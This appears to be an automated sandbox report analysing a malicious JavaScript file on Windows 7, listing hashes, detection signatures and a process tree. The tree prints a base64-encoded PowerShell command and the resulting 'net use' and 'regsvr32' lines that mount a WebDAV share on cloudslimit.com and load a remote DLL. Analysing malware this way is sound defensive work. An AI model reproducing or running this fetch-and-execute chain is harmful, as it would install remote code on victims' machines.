Overview

overview

7

Static

static

1

234912348282128518.js

windows7-x64

6

234912348282128518.js

windows10-2004-x64

7

Analysis

  • max time kernel
    14s
  • max time network
    21s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    25/07/2024, 21:27

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    234912348282128518.js

  • Size

    19KB

  • MD5

    6efedd2ed0f8a1216d81738bab9b4a48

  • SHA1

    ae06acf250e040287b9ca9bce64e6094d2e7b06b

  • SHA256

    643297279e5562c1772337378280d71b6598da278a16a970305358032bf53c22

  • SHA512

    2432ae65749b12c49be23739124c12bce51a645df2698b531fe54252002bff967c88396d0cc50ba8acf9abec6f85d70a7f49f778795796d64412ecc7d9981624

  • SSDEEP

    384:Qpa7OzAAdNa0w88YUIwNSw6aRByUGmzZAd6ngm:Qpa7OUWa0w88YUIASw6aRByUGmzZAd6F

Score
6/10
defense_evasionexecution

Malware Config

Signatures

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

    defense_evasion
  • Command and Scripting Interpreter: JavaScript 1 TTPs
    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\234912348282128518.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1972
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABjAGwAbwB1AGQAcwBsAGkAbQBpAHQALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgBlAGcAcwB2AHIAMwAyACAALwBzACAAXABcAGMAbABvAHUAZABzAGwAaQBtAGkAdAAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADQANgAzADkAMgA3ADQAMwA3ADgAOAA1ADUALgBkAGwAbAA=
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2444
      • C:\Windows\system32\net.exe
        "C:\Windows\system32\net.exe" use \\cloudslimit.com@8888\davwwwroot\
        3⤵
          PID:2100
        • C:\Windows\system32\regsvr32.exe
          "C:\Windows\system32\regsvr32.exe" /s \\cloudslimit.com@8888\davwwwroot\24639274378855.dll
          3⤵
            PID:3064

      Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • memory/2444-4-0x000007FEF5B9E000-0x000007FEF5B9F000-memory.dmp

              Filesize

              4KB

              Download

            • memory/2444-6-0x000000001B120000-0x000000001B402000-memory.dmp

              Filesize

              2.9MB

              Download

            • memory/2444-5-0x000007FEF58E0000-0x000007FEF627D000-memory.dmp

              Filesize

              9.6MB

              Download

            • memory/2444-7-0x00000000022A0000-0x00000000022A8000-memory.dmp

              Filesize

              32KB

              Download

            • memory/2444-8-0x000007FEF58E0000-0x000007FEF627D000-memory.dmp

              Filesize

              9.6MB

              Download

            • memory/2444-9-0x000007FEF58E0000-0x000007FEF627D000-memory.dmp

              Filesize

              9.6MB

              Download

            • memory/2444-10-0x000007FEF58E0000-0x000007FEF627D000-memory.dmp

              Filesize

              9.6MB

              Download

            • memory/2444-11-0x000007FEF58E0000-0x000007FEF627D000-memory.dmp

              Filesize

              9.6MB

              Download